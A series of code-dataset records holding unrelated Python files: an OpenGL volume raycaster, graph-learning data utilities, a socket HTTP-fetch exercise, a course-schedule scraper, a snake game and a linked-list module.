GL_CLAMP_TO_BORDER)\n glTexParameteri(GL_TEXTURE_3D, GL_TEXTURE_WRAP_T, GL_CLAMP_TO_BORDER)\n glTexParameteri(GL_TEXTURE_3D, GL_TEXTURE_WRAP_R, GL_CLAMP_TO_BORDER)\n glTexImage3D(GL_TEXTURE_3D, 0, internal_format, self.dim_tex[0], self.dim_tex[1], self.dim_tex[2], 0, format, GL_FLOAT, self.data)\n glBindTexture(GL_TEXTURE_3D, 0)\n\n self.data = None\n###################################################################################################################\nclass FBO_bbox:\n def __init__(self, width, height):\n self.width = width\n self.height = height\n\n self.fbo = glGenFramebuffers(1)\n glBindFramebuffer(GL_FRAMEBUFFER, self.fbo)\n\n self.buf_back = glGenTextures(1)\n glBindTexture(GL_TEXTURE_2D, self.buf_back)\n glTexParameteri(GL_TEXTURE_2D, GL_TEXTURE_MAG_FILTER, GL_LINEAR)\n glTexParameteri(GL_TEXTURE_2D, GL_TEXTURE_MIN_FILTER, GL_LINEAR)\n glTexParameteri(GL_TEXTURE_2D, GL_TEXTURE_WRAP_S, GL_CLAMP_TO_BORDER)\n glTexParameteri(GL_TEXTURE_2D, GL_TEXTURE_WRAP_T, GL_CLAMP_TO_BORDER)\n glTexImage2D(GL_TEXTURE_2D, 0, GL_RGBA32F, width, height, 0, GL_RGBA, GL_FLOAT, None)\n glBindTexture(GL_TEXTURE_2D, 0)\n\n self.buf_front = glGenTextures(1)\n glBindTexture(GL_TEXTURE_2D, self.buf_front)\n glTexParameteri(GL_TEXTURE_2D, GL_TEXTURE_MAG_FILTER, GL_LINEAR)\n glTexParameteri(GL_TEXTURE_2D, GL_TEXTURE_MIN_FILTER, GL_LINEAR)\n glTexParameteri(GL_TEXTURE_2D, GL_TEXTURE_WRAP_S, GL_CLAMP_TO_BORDER)\n glTexParameteri(GL_TEXTURE_2D, GL_TEXTURE_WRAP_T, GL_CLAMP_TO_BORDER)\n glTexImage2D(GL_TEXTURE_2D, 0,GL_RGBA32F, width, height, 0, GL_RGBA, GL_FLOAT, None)\n glBindTexture(GL_TEXTURE_2D, 0)\n\n self.rbo = glGenRenderbuffers(1)\n glBindRenderbuffer(GL_RENDERBUFFER, self.rbo)\n glRenderbufferStorage(GL_RENDERBUFFER, GL_DEPTH_COMPONENT, width, height)\n glFramebufferRenderbuffer(GL_FRAMEBUFFER, GL_DEPTH_ATTACHMENT, GL_RENDERBUFFER, self.rbo)\n glBindRenderbuffer(GL_RENDERBUFFER, 0)\n\n glBindFramebuffer(GL_FRAMEBUFFER, 0)\n\n\n###################################################################################################################\nclass QuadFull:\n RENDER_MODE_BLINN_PHONG = 0\n RENDER_MODE_CURVATURE = 1\n NUM_RENDER_MODE = 2\n def __init__(self, volume, size_fbo):\n self.tex_bbox_back = volume.bbox.fbo.buf_back\n self.tex_bbox_front = volume.bbox.fbo.buf_front\n self.tex_volume = volume.texid\n\n self.render_mode = self.RENDER_MODE_CURVATURE\n\n uniforms = ['tex_back', 'tex_front', 'tex_volume', 'scale_axes', 'dim', \n 'level', 'scale_step', 'MV', 'render_mode', 'tex_colormap_2d']\n\n self.prog = Program('raycast_simple.vert', 'cc6_raycast_open.frag', uniforms)\n\n self.init_colormap()\n\n self.init_vao()\n\n self.scale_step = 0.001\n\n#------------------------------------------------------------------------------------------------------------------------ \n def init_vao(self):\n verts = np.array(\n [-1, -1, 0, 0,\n 1, -1, 1, 0,\n 1, 1, 1, 1,\n -1, 1, 0, 1], dtype=np.float32)\n\n self.vao = glGenVertexArrays(1)\n glBindVertexArray(self.vao)\n self.vbo = glGenBuffers(1)\n glBindBuffer(GL_ARRAY_BUFFER, self.vbo)\n glBufferData(GL_ARRAY_BUFFER, len(verts)*ctypes.sizeof(ctypes.c_float), verts, GL_STATIC_DRAW)\n glEnableVertexAttribArray(0)\n glVertexAttribPointer(0, 2, GL_FLOAT, GL_FALSE, 4*ctypes.sizeof(ctypes.c_float), None)\n glEnableVertexAttribArray(1)\n glVertexAttribPointer(1, 2, GL_FLOAT, GL_FALSE, 4*ctypes.sizeof(ctypes.c_float), ctypes.c_void_p(2*ctypes.sizeof(ctypes.c_float)))\n glBindVertexArray(0)\n#------------------------------------------------------------------------------------------------------------------------ \n def render_raycast_shading(self, level, volume, MV):\n\n glClearColor(0, 0, 0, 0)\n glClear(GL_COLOR_BUFFER_BIT | GL_DEPTH_BUFFER_BIT)\n glActiveTexture(GL_TEXTURE0)\n glBindTexture(GL_TEXTURE_2D, self.tex_bbox_back)\n glActiveTexture(GL_TEXTURE1)\n glBindTexture(GL_TEXTURE_2D, self.tex_bbox_front)\n glActiveTexture(GL_TEXTURE2)\n glBindTexture(GL_TEXTURE_3D, self.tex_volume)\n glActiveTexture(GL_TEXTURE3)\n glBindTexture(GL_TEXTURE_2D, self.tex_colormap_2d)\n\n glUseProgram(self.prog.id)\n\n glUniform1i(self.prog.uniform_locs['tex_back'], 0) \n glUniform1i(self.prog.uniform_locs['tex_front'], 1) \n glUniform1i(self.prog.uniform_locs['tex_volume'], 2)\n glUniform1i(self.prog.uniform_locs['tex_colormap_2d'], 3)\n glUniform1f(self.prog.uniform_locs['level'], level)\n glUniform3f(self.prog.uniform_locs['scale_axes'], volume.bbox.scale_axes[0], volume.bbox.scale_axes[1], volume.bbox.scale_axes[2])\n glUniform3f(self.prog.uniform_locs['dim'], volume.info.dim[0], volume.info.dim[1], volume.info.dim[2])\n glUniform1f(self.prog.uniform_locs['scale_step'], self.scale_step)\n glUniformMatrix4fv(self.prog.uniform_locs['MV'], 1, GL_FALSE, MV)\n glUniform1i(self.prog.uniform_locs['render_mode'], self.render_mode);\n\n glBindVertexArray(self.vao)\n glDrawArrays(GL_TRIANGLE_FAN, 0, 4)\n glBindVertexArray(0)\n\n#------------------------------------------------------------------------------------------------------------------------ \n def init_colormap(self):\n# 3x3 colormap for min-max curvature\n colormap_2d = np.array([[ 1, 0, 0], [ 1, 1, 0], [0,1,0],\n [.5,.5,.5], [.5,.5,.5], [0,1,1],\n [.5,.5,.5], [.5,.5,.5], [0,0,1]], dtype=np.float32)\n self.tex_colormap_2d = glGenTextures(1)\n glBindTexture(GL_TEXTURE_2D, self.tex_colormap_2d)\n glPixelStorei(GL_UNPACK_ALIGNMENT,1)\n glTexParameterf(GL_TEXTURE_2D, GL_TEXTURE_MAG_FILTER, GL_LINEAR)\n glTexParameterf(GL_TEXTURE_2D, GL_TEXTURE_MIN_FILTER, GL_LINEAR)\n glTexParameterf(GL_TEXTURE_2D, GL_TEXTURE_WRAP_S, GL_CLAMP_TO_EDGE)\n glTexParameterf(GL_TEXTURE_2D, GL_TEXTURE_WRAP_T, GL_CLAMP_TO_EDGE)\n\n glTexImage2D(GL_TEXTURE_2D, 0, GL_RGBA, 3, 3, 0, GL_RGB, GL_FLOAT, colormap_2d)\n\n###################################################################################################################\nclass Program:\n def __init__(self, filename_vert, filename_frag, uniforms):\n src_vert = open(filename_vert, 'r').read()\n src_frag = open(filename_frag, 'r').read()\n self.id = self.build(src_vert, src_frag, uniforms)\n\n#------------------------------------------------------------------------------------------------------------------------ \n def compile(self, src, type):\n \n id = glCreateShader(type)\n glShaderSource(id, src)\n glCompileShader(id)\n result = glGetShaderiv(id, GL_COMPILE_STATUS)\n \n if not(result):\n print('shader compilation error.')\n print(glGetShaderInfoLog(id))\n input('press any key to continue.')\n raise RuntimeError(\n \"\"\"Shader compile failure (%s): %s\"\"\"%( result, glGetShaderInfoLog( id ),),\n src, type,)\n return id\n\n#------------------------------------------------------------------------------------------------------------------------ \n def build(self, src_vert, src_frag, uniforms):\n id_vert = self.compile(src_vert, GL_VERTEX_SHADER)\n id_frag = self.compile(src_frag, GL_FRAGMENT_SHADER)\n program = glCreateProgram()\n if not program:\n raise RunTimeError('glCreateProgram faled!')\n \n glAttachShader(program, id_vert)\n glAttachShader(program, id_frag)\n glLinkProgram(program)\n status = glGetProgramiv(program, GL_LINK_STATUS)\n if not status:\n infoLog = glGetProgramInfoLog(program)\n glDeleteProgram(program)\n glDeleteShader(id_vert)\n glDeleteShader(id_frag)\n print(infoLog)\n raise RuntimeError(\"Error linking program:\\n%s\\n\", infoLog)\n\n self.uniform_locs = {}\n for u in uniforms:\n self.uniform_locs[u] = glGetUniformLocation(program, u)\n return program\n\n\n###################################################################################################################\nclass Scene: \n def __init__(self, width, height):\n\n self.width = width\n self.height = height\n\n self.view_angle = 21\n self.angle_x = 320\n self.angle_y = 0\n self.position_x = 0\n self.position_y = 0\n\n\n volume_name = 'ML_25'\n# volume_name = 'ML_50'\n\n fbo_size = (width, height)\n\n self.volume = Volume(volumes[volume_name], fbo_size)\n\n self.quad_full = QuadFull(self.volume, fbo_size)\n\n self.refresh_MVP()\n\n self.texid = [self.volume.bbox.fbo.buf_front, self.volume.bbox.fbo.buf_back]\n \n self.level = volumes[volume_name].level\n\n#------------------------------------------------------------------------------------------------------------------------ \n def refresh_MVP(self):\n\n self.P = glm.perspective(np.radians(self.view_angle), self.width/self.height, 1, 3)\n\n self.MV = glm.translate(glm.mat4(), glm.vec3(self.position_x, self.position_y, -2))\n self.MV = glm.rotate(self.MV, np.radians(self.angle_x), glm.vec3(1,0,0))\n self.MV = glm.rotate(self.MV, np.radians(self.angle_y), glm.vec3(0,1,0))\n\n self.MVP = np.array(self.P * self.MV)\n\n self.MV = np.array(self.MV)\n#------------------------------------------------------------------------------------------------------------------------ \n def render_shading(self):\n self.volume.bbox.render_bbox(self.MVP)\n self.quad_full.render_raycast_shading(self.level, self.volume, self.MV) \n\n###################################################################################################################\nclass RenderWindow:\n def __init__(self):\n cwd = os.getcwd() # save current working directory\n glfw.init() # initialize glfw - this changes cwd\n os.chdir(cwd) # restore cwd\n\n glfw.window_hint(glfw.CONTEXT_VERSION_MAJOR, 3)\n glfw.window_hint(glfw.CONTEXT_VERSION_MINOR, 3)\n glfw.window_hint(glfw.OPENGL_FORWARD_COMPAT, GL_TRUE)\n glfw.window_hint(glfw.OPENGL_PROFILE, glfw.OPENGL_CORE_PROFILE)\n \n self.width, self.height = 512, 512\n self.aspect = self.width/float(self.height)\n self.win = glfw.create_window(self.width, self.height, 'raycaster (cc6)', None, None)\n glfw.make_context_current(self.win)\n\n # for retina display...\n self.fb_width, self.fb_height = glfw.get_framebuffer_size(self.win)\n\n glEnable(GL_DEPTH_TEST)\n glClearColor(0.0, 0.0, 0.0,0.0)\n\n glfw.set_key_callback(self.win, self.onKeyboard)\n glfw.set_window_size_callback(self.win, self.onSize) \n\n self.scene = Scene(self.fb_width, self.fb_height)\n\n self.exitNow = False\n \n def onKeyboard(self, win, key, scancode, action, mods):\n if action == glfw.PRESS:\n # ESC to quit\n if key == glfw.KEY_ESCAPE: \n self.exitNow = True\n elif key == glfw.KEY_RIGHT:\n self.scene.angle_y = (self.scene.angle_y + 10) % 360\n self.scene.refresh_MVP()\n elif key == glfw.KEY_LEFT:\n self.scene.angle_y = (self.scene.angle_y - 10) % 360\n self.scene.refresh_MVP()\n elif key == glfw.KEY_UP:\n self.scene.angle_x = (self.scene.angle_x - 10) % 360\n self.scene.refresh_MVP()\n elif key == glfw.KEY_DOWN:\n self.scene.angle_x = (self.scene.angle_x + 10) % 360\n self.scene.refresh_MVP()\n elif key == glfw.KEY_EQUAL:\n self.scene.level = self.scene.level + set_step_level(mods)\n print(self.scene.level)\n elif key == glfw.KEY_MINUS:\n self.scene.level = self.scene.level - set_step_level(mods)\n print(self.scene.level)\n elif key == glfw.KEY_PAGE_UP:\n self.scene.view_angle = self.scene.view_angle - 1\n self.scene.refresh_MVP()\n print(self.scene.view_angle)\n elif key == glfw.KEY_PAGE_DOWN:\n self.scene.view_angle = self.scene.view_angle + 1\n self.scene.refresh_MVP()\n print(self.scene.view_angle)\n elif key == glfw.KEY_TAB:\n self.scene.quad_full.render_mode = (self.scene.quad_full.render_mode + 1) % self.scene.quad_full.NUM_RENDER_MODE\n print(self.scene.quad_full.render_mode)\n \n def onSize(self, win, width, height):\n self.aspect = width/float(height)\n self.scene.width = width\n self.scene.height = height\n\n def run(self):\n glfw.set_time(0)\n glClearColor(1,1,1,1)\n lastT = glfw.get_time()\n frames = 0\n while not glfw.window_should_close(self.win) and not self.exitNow:\n currT = glfw.get_time()\n if frames == 20:\n elapsed = currT - lastT\n print('fps = {}'.format(frames/elapsed))\n lastT = currT\n frames = 0\n self.scene.render_shading()\n frames += 1\n glfw.swap_buffers(self.win)\n glfw.poll_events()\n glfw.terminate()\n\n# main() function\ndef main():\n print(\"Starting raycaster. \"\n \"Press ESC to quit.\")\n rw = RenderWindow()\n rw.run()\n\n# call main\nif __name__ == '__main__':\n main()\n","sub_path":"raycaster_cc6.py","file_name":"raycaster_cc6.py","file_ext":"py","file_size_in_byte":21470,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"442184719","text":"\nfrom collections import defaultdict as dd\nimport random\nfrom scipy import sparse\nimport numpy as np\nfrom numpy import linalg as lin\n\ndef top_sort(in_edges):\n g_order, new_update = [1], [1]\n in_d = {}\n mat = set()\n for k, edges in in_edges.iteritems():\n in_d[k] = len(edges)\n for j in edges:\n mat.add((k, j))\n while True:\n new_new_update = []\n for k in in_edges.keys():\n if in_d[k] == 0: continue\n for j in new_update:\n if (k, j) in mat is not None: in_d[k] -= 1\n if in_d[k] == 0: new_new_update.append(k)\n if len(new_new_update) == 0:\n break\n for k in new_new_update:\n g_order.append(k)\n new_update = new_new_update\n return g_order\n\ndef read_cites(filename):\n cites = []\n for line in open(filename):\n cites.append(tuple(line.strip().split()))\n return cites\n\ndef read_content(filename):\n features, labels, label_set, num_f = dd(list), {}, set(), 0\n for line in open(filename):\n inputs = line.strip().split()\n id, label = inputs[0], inputs[-1]\n labels[id] = label\n label_set.add(label)\n for i in range(1, len(inputs) - 1):\n if float(inputs[i]) > 0:\n features[id].append((i - 1, 1.0))\n num_f = max(num_f, i)\n return features, labels, sorted(list(label_set)), num_f\n\ndef split_data(labels, perc):\n train, test = [], []\n random.seed(0)\n for id in labels.keys():\n rand = random.random()\n if rand < 0.7 * perc:\n train.append(id)\n elif rand > 0.7:\n test.append(id)\n return train, test\n\ndef construct_x_y(features, labels, label_list, num_f, ids):\n row, col, data = [], [], []\n y = np.zeros((len(ids), len(label_list)), dtype = np.int32)\n for i, id in enumerate(ids):\n for ff in features[id]:\n row.append(i)\n col.append(ff[0])\n data.append(ff[1])\n y[i, label_list.index(labels[id])] = 1.0\n x = sparse.coo_matrix((data, (row, col)), shape = (len(ids), num_f), dtype = np.float32).tocsr()\n return x, y\n\ndef get_index(keys):\n index = {}\n for i, id in enumerate(keys):\n index[id] = i\n return index\n\ndef gen_random_walk(cites, index):\n graph = dd(list)\n for id1, id2 in cites:\n graph[id1].append(id2)\n graph[id2].append(id1)\n\n g = []\n for _ in range(5):\n for id1 in graph.keys():\n path = [id1]\n for _ in range(10):\n path.append(random.choice(graph[path[-1]]))\n for i in range(len(path)):\n for j in range(i - 3, i + 3 + 1):\n if j < 0 or j >= len(path): continue\n if path[i] not in index or path[j] not in index: continue\n g.append([index[path[i]], index[path[j]]])\n return np.array(g, dtype = np.int32)\n\ndef gen_second(cites, index):\n graph = dd(list)\n for id1, id2 in cites:\n graph[id1].append(id2)\n graph[id2].append(id1)\n\n g = []\n for id1 in graph.keys():\n if id1 not in index: continue\n for id2 in graph[id1]:\n if id2 in index:\n g.append([index[id1], index[id2]])\n return np.array(g, dtype = np.int32)\n\ndef gen_graph_features(cites, ids):\n new_index = {}\n cnt = 0\n for id1, id2 in cites:\n if id1 not in new_index:\n new_index[id1] = cnt\n cnt += 1\n if id2 not in new_index:\n new_index[id2] = cnt\n cnt += 1\n\n row, col, data = [], [], []\n index = get_index(ids)\n for id1, id2 in cites:\n if id1 not in index: continue\n row.append(index[id1])\n col.append(new_index[id2])\n data.append(1.0)\n return sparse.coo_matrix((data, (row, col)), shape = (len(ids), cnt), dtype = np.float32).tocsr()\n\ndef read_params(filename):\n max_id = 0\n rec, label_set = [], set()\n for line in open(filename):\n if not line.startswith('f'): continue\n inputs = line.strip().split()\n w = float(inputs[1])\n inputs = inputs[0][3 :][: -1].split(',')\n id = int(inputs[0]) - 1\n label = inputs[1][1 :]\n\n max_id = max(id, max_id)\n label_set.add(label)\n rec.append((id, label, w))\n\n ret = {}\n for label in label_set:\n ret[label] = np.zeros((max_id + 1, 1), dtype = np.float32)\n for id, label, w in rec:\n ret[label][id, 0] = w\n return ret\n\ndef read_ids(filename):\n ids = []\n for line in open(filename):\n id = line.strip().split()[0].split('(')[1].split(',')[0].strip()\n ids.append(id)\n return ids\n\ndef gen_dataset(cite_file, corpus_file, perc, args):\n cites = read_cites(cite_file)\n features, labels, label_list, num_f = read_content(corpus_file)\n train_id, test_id = split_data(labels, perc)\n # train_id, test_id = read_ids('train.examples'), read_ids('test.examples')\n\n x, y = construct_x_y(features, labels, label_list, num_f, labels.keys())\n fea_vecs = {'f': sparse.hstack([x, gen_graph_features(cites, labels.keys())], format = 'csr')}\n # fea_vecs = {'f': x}\n ret_labels = {}\n for i, label in enumerate(label_list):\n ret_labels[label] = y[:, i]\n index = get_index(labels.keys())\n train_ind = [index[i] for i in train_id]\n test_ind = [index[i] for i in test_id]\n\n g, gy = {}, {}\n if args.entropy:\n g['entropy'] = np.arange(x.shape[0]).reshape((x.shape[0], 1))\n gy['entropy'] = np.ones(x.shape[0], dtype = np.float32) * 1e-1\n\n if args.manifold:\n g['manifold'] = gen_second(cites, index)\n gy['manifold'] = np.ones(g['manifold'].shape[0], dtype = np.float32) * 1e-4\n\n if args.cotrain:\n g['cotrain'] = np.arange(x.shape[0]).reshape((x.shape[0], 1))\n gy['cotrain'] = np.ones(x.shape[0], dtype = np.float32) * 1e-3\n\n # fea_vecs['g'] = sparse.hstack([x, gen_graph_features(cites, labels.keys())], format = 'csr')\n fea_vecs['g'] = gen_graph_features(cites, labels.keys())\n\n return fea_vecs, ret_labels, train_ind, test_ind, g, gy\n","sub_path":"compile/data.py","file_name":"data.py","file_ext":"py","file_size_in_byte":6122,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"595305781","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Wed May 14 17:05:59 2014\n\n@author: Alejandro\n\"\"\"\nfrom GaussianExperiment import GaussianExperiment\n#[Experiment 1]\ndef experiment(n_samples, n_outliers, n_clusters, n_features, n_experiment):\n gaussianExperiment = GaussianExperiment(n_samples = n_samples, \\\n n_outliers = n_outliers, n_clusters = n_clusters, \\\n n_features = n_features, n_experiment = n_experiment)\n\n X,y = gaussianExperiment.generate_data()\n X_contaminated = gaussianExperiment.generate_contamination()\n gaussianExperiment.show_graph_3d(X,y,X_contaminated)\n #gaussianExperiment.save_data()\n \nexperiment(n_samples= 300 , n_outliers = 150 , n_clusters = 4 \\\n , n_features =3 , n_experiment = 1)\n \nexperiment(n_samples= 300 , n_outliers = 150 , n_clusters = 4 \\\n , n_features =3 , n_experiment = 2)","sub_path":"matlab/+gaussian_experiment/second_code/ParameterExperiment.py","file_name":"ParameterExperiment.py","file_ext":"py","file_size_in_byte":843,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"650052236","text":"def fibo(n):\n if n <= 1:\n return n\n else:\n return (fibo(n - 1) + fibo(n - 2))\n\nntermos = eval(input('Quantos termos da sequencia deseja imprimir? '))\nwhile ntermos <= 0:\n ntermos = eval(input('Digite um número positivo: '))\nfor i in range(ntermos):\n print(fibo(i+1)) # usa-se +1 para que não seja imprimido o \"0\", que não faz parte da sequência fibonacci\n","sub_path":"fibo.py","file_name":"fibo.py","file_ext":"py","file_size_in_byte":385,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"375898322","text":"# Exercise 2: Change your socket program so that it counts the number of\n# characters it has received and stops displaying any text after it has shown\n# 3000 characters. The program should retrieve the entire document and count\n# the total number of characters and display the count of the number of\n# characters at the end of the document.\n\n# This version of the program displays all received characters,\n# including the header data.\n\nimport socket\n\ngeturl = input(\"Please enter a URL: \")\n\ncount = 0\nsite = b\"\"\n\ntry:\n getsock = geturl.split('/')\n\n url = 'GET ' + geturl + ' HTTP/1.0\\r\\n\\r\\n'\n\n mysock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\n mysock.connect((getsock[2], 80))\n cmd = url.encode()\n mysock.send(cmd)\n\n while True:\n data = mysock.recv(512)\n if len(data) < 1:\n break\n count += len(data)\n site += data\n\n mysock.close()\n\n print(site[:3001].decode())\n print(\"\\n\")\n print('Total character count is:', count)\n\nexcept:\n print('Error, improperly formatted or non-existent URL.')\n","sub_path":"Python/FreeCodeCamp/PY4E_Python_for_Everybody/ch_12_NetworkedPrograms/ex_12_02_01.py","file_name":"ex_12_02_01.py","file_ext":"py","file_size_in_byte":1071,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"325059714","text":"\"\"\" Convert JSON to relevant matrices. \"\"\"\n\nfrom pandas import DataFrame\n\ndef person_packages(data):\n \"\"\" Person by Package Matrix. \"\"\"\n ppm = []\n for datum in data:\n package_url = datum['package_url']\n for participant in datum['participants']['participants']:\n ppm.append((participant, package_url))\n\n df = DataFrame(ppm)\n df.columns = ['person', 'package']\n return df\n\ndef packages_weights(data):\n \"\"\" Person by Weights Matrix. \"\"\"\n pwm = []\n for datum in data:\n pwm.append((datum['package_url'],\n datum['repo_activity']['repository_forks'],\n datum['repo_activity']['repository_stars'],\n datum['usage']['# Using This']))\n pf = DataFrame(pwm)\n pf.columns = ['package', 'repository_forks', 'repository_stars',\n 'using_this']\n return pf\n\n","sub_path":"Crawl/json_conversion.py","file_name":"json_conversion.py","file_ext":"py","file_size_in_byte":879,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"29119314","text":"# -*- coding: utf-8 -*-\nfrom bs4 import BeautifulSoup # Parser de código html\nimport requests # Descargar html\nimport re # Expresiones regulares\nfrom urlparse import urljoin # Obtener las url de las etiquetas a\nfrom collections import namedtuple\nimport logging\nimport sys\n\nCICLO = \"2015-2\"\nURL_HORARIOS = \"http://www.fciencias.unam.mx/docencia/horarios/indice/20152\"\n\n\nclass Materia(object):\n \"\"\"docstring for Materia\"\"\"\n def __init__(self, arg, nombre):\n super(Materia).__init__()\n self.id = id\n self.nombre = nombre\n self.carreras = list()\n\n\ndef crear_url_carreras(url_horarios, lista_tag_carreras):\n Carrera = namedtuple('Carrera', 'identificador nombre plan url')\n carreras = set()\n for tag_carrera in lista_tag_carreras:\n plan_re = re.search(\"\\d{4}\", tag_carrera.text)\n if plan_re is None: # Si no encuentra el plan entonces lo ignora\n continue\n identificador = tag_carrera[\"href\"].split(\"/\")[-1]\n nombre = tag_carrera.text\n plan = plan_re.group(0)\n url = urljoin(url_horarios, tag_carrera[\"href\"])\n nueva_carrera = Carrera(identificador, nombre, plan, url)\n carreras.add(nueva_carrera)\n return carreras\n\n\ndef crear_url_materias(url_horarios, conjunto_carreas):\n sys.stdout.write(\"Obteniendo las materias\") # python2 para imprimir sin salto de línea\n sys.stdout.flush()\n Materia = namedtuple('Materia', 'identificador nombre carrera_id url')\n materias = set()\n for carrera in conjunto_carreas:\n intentos = 10\n while intentos:\n try:\n respuesta = requests.get(carrera.url, timeout=5)\n respuesta.raise_for_status() # Verifica que el estado de la respuesta\n except Exception:\n intentos -= 1\n if intentos == 0:\n logging.warning(\"La url: \" + carrera.url + \" no se pudo acceder\")\n continue\n break\n sys.stdout.write(\".\") # python2 para imprimir sin salto de línea\n sys.stdout.flush()\n sopa_materias = BeautifulSoup(respuesta.text)\n # Encuntra el id donde están los links a las materias\n div_materias = sopa_materias.find(id=\"info-contenido\")\n # Encuentra las url de las carreras\n lista_tag_materias = div_materias.find_all(\"a\", href=re.compile(\"/docencia/\"))\n for tag_materia in lista_tag_materias:\n identificador = tag_materia[\"href\"].split(\"/\")[-1]\n nombre = tag_materia.text.split(\",\")[0]\n carrera_id = carrera.identificador\n url = urljoin(url_horarios, tag_materia[\"href\"])\n nueva_materia = Materia(identificador, nombre, carrera_id, url)\n materias.add(nueva_materia)\n print(\"\")\n return materias\n\n\ndef crear_url_cursos(url_horarios, conjunto_materias):\n sys.stdout.write(\"Obteniendo los cursos\") # python2 para imprimir sin salto de línea\n sys.stdout.flush()\n Curso = namedtuple('Curso', 'identificador semestre profesores materia_id')\n cursos = set()\n for materia in conjunto_materias:\n intentos = 10\n while intentos:\n try:\n respuesta = requests.get(materia.url, timeout=5)\n respuesta.raise_for_status() # Verifica que el estado de la respuesta\n except Exception:\n intentos -= 1\n if intentos == 0:\n logging.warning(\"La url: \" + materia.url + \" no se pudo acceder\")\n continue\n break\n sys.stdout.write(\".\") # python2 para imprimir sin salto de línea\n sys.stdout.flush()\n sopa_materias = BeautifulSoup(respuesta.text)\n # Encuntra el id donde están los cursos\n div_materias = sopa_materias.find(id=\"info-contenido\")\n # Encuentra las url de las carreras\n for contenido in div_materias.children:\n print(contenido)\n break\n # pendiente\n print(\"\")\n return cursos\n\n\ndef obtener_paginas_de_cursos(url_horarios, ciclo):\n print(\"Obteniendo las carreras\")\n cursos_html = set()\n #Procesa página del ciclo escolar\n intentos = 10\n while intentos:\n try:\n respuesta = requests.get(url_horarios, timeout=5)\n respuesta.raise_for_status() # Verifica que el estado de la respuesta\n except Exception:\n intentos -= 1\n if intentos == 0:\n logging.warning(\"No se pudo accerder a la página de la facultad\")\n return\n continue\n break\n sopa_carreras = BeautifulSoup(respuesta.text)\n # Encuntra el id donde están los links a las carreras\n div_carreras = sopa_carreras.find(id=\"info-contenido\")\n if div_carreras is None:\n raise Exception(\"No se encontró la div de las carreras\")\n # Encuentra las url de las carreras\n url_carreras = div_carreras.find_all(\"a\", href=re.compile(\"/indiceplan/\"))\n if len(url_carreras) == 0:\n raise Exception(\"No se encontraron las url de las carreras\")\n carreras = crear_url_carreras(url_horarios, url_carreras)\n materias = crear_url_materias(url_horarios, carreras)\n cursos = crear_url_cursos(url_horarios, materias)\n #Obtiene las url de las carreras y plan\n\n #Obtiene\n return cursos_html\n\n\ndef main():\n cursos_crudos = obtener_paginas_de_cursos(URL_HORARIOS, CICLO)\n pass\n\n\nif __name__ == '__main__':\n main()\n","sub_path":"back_end/python/obtiene_horarios.py","file_name":"obtiene_horarios.py","file_ext":"py","file_size_in_byte":5447,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"556314401","text":"import random\n\nclass Segment:\n\n def __init__ (self, X, Y):\n self.X = int(X)\n self.Y = int(Y)\n \n def setNext (self, next):\n self.next = next\n\nclass Snake:\n\n def __init__ (self, head, tail):\n self.head = head\n self.tail = tail\n self.length = 3\n self.direction = \"down\"\n \n def move(self):\n nextX = self.head.X\n nextY = self.head.Y\n nextSeg = self.head.next\n if self.direction == \"up\": \n self.head.Y -= 1\n elif self.direction == \"down\":\n self.head.Y += 1\n elif self.direction == \"right\":\n self.head.X += 1\n elif self.direction == \"left\":\n self.head.X -= 1\n\n for i in range(self.length-1):\n xBuff = nextSeg.X\n yBuff = nextSeg.Y\n nextSeg.X = nextX\n nextSeg.Y = nextY\n if (i < self.length-2):\n nextSeg = nextSeg.next\n nextX = xBuff\n nextY = yBuff\n\n def isDead(self, height, width):\n if self.length > 4:\n currentSeg = self.head.next.next.next\n for i in range (self.length):\n if currentSeg.X == self.head.X and currentSeg.Y == self.head.Y:\n return True\n if i < self.length-4:\n currentSeg = currentSeg.next\n if self.head.Y < 0 or self.head.Y >= height or self.head.X >= width or self.head.X < 0:\n return True\n\n def grow(self):\n self.length += 1\n newSeg = Segment(self.head.X, self.head.Y)\n newSeg.next = self.head\n self.head = newSeg\n \nclass Apple: \n\n def __init__ (self, width, height):\n self.xMax = width - 1\n self.yMax = height - 1\n self.generate()\n\n def generate(self):\n self.X = random.randint(0, self.xMax)\n self.Y = random.randint(0, self.yMax) \n ","sub_path":"Snake AI/objects.py","file_name":"objects.py","file_ext":"py","file_size_in_byte":1905,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"461991871","text":"# -*- coding:utf8 -*-\nimport sys\n\n\nclass ListNode:\n\tvalue = \"\"\n\tnext = None\n\tdef __init__(self):\n\t\tself.value = \"\"\n\t\tself.next = None\n\ndef constructList(List):\n\theadNode = None\n\tfor item in List:\n\t\theadNode = addToTail(headNode , item)\n\treturn headNode\ndef addToTail(listNode , value):\n\tnewNode = ListNode()\n\tnewNode.value = value\n\tnewNode.next = None\n\tif listNode == None:\n\t\theadNode = newNode\n\telse:\n\t\theadNode = listNode\n\t\twhile listNode.next != None:\n\t\t\tlistNode = listNode.next\n\t\tlistNode.next = newNode\n\treturn headNode\ndef addToHead(listNode , value):\n\tnewNode = ListNode()\n\tnewNode.value = value\n\tnewNode.next = listNode\n\treturn newNode\ndef removeNode(listNode , value):\n\tif listNode == None:\n\t\treturn None\n\telif listNode.next == None:\n\t\tif listNode.value == value:\n\t\t\treturn None\n\t\telse:\n\t\t\treturn listNode\n\telse:\n\t\theadNode = listNode\n\t\twhile listNode.next != None:\n\t\t\tif listNode.next.value != value:\n\t\t\t\tlistNode = listNode.next\n\t\t\telse:\n\t\t\t\tlistNode.next = listNode.next.next\n\t\treturn headNode\n\n\n\n\n\n\n\n\n\n\n\n\t\t\t\t\n\t\t\n\t\t\n\t\t\n\n\n","sub_path":"ListNode.py","file_name":"ListNode.py","file_ext":"py","file_size_in_byte":1034,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} 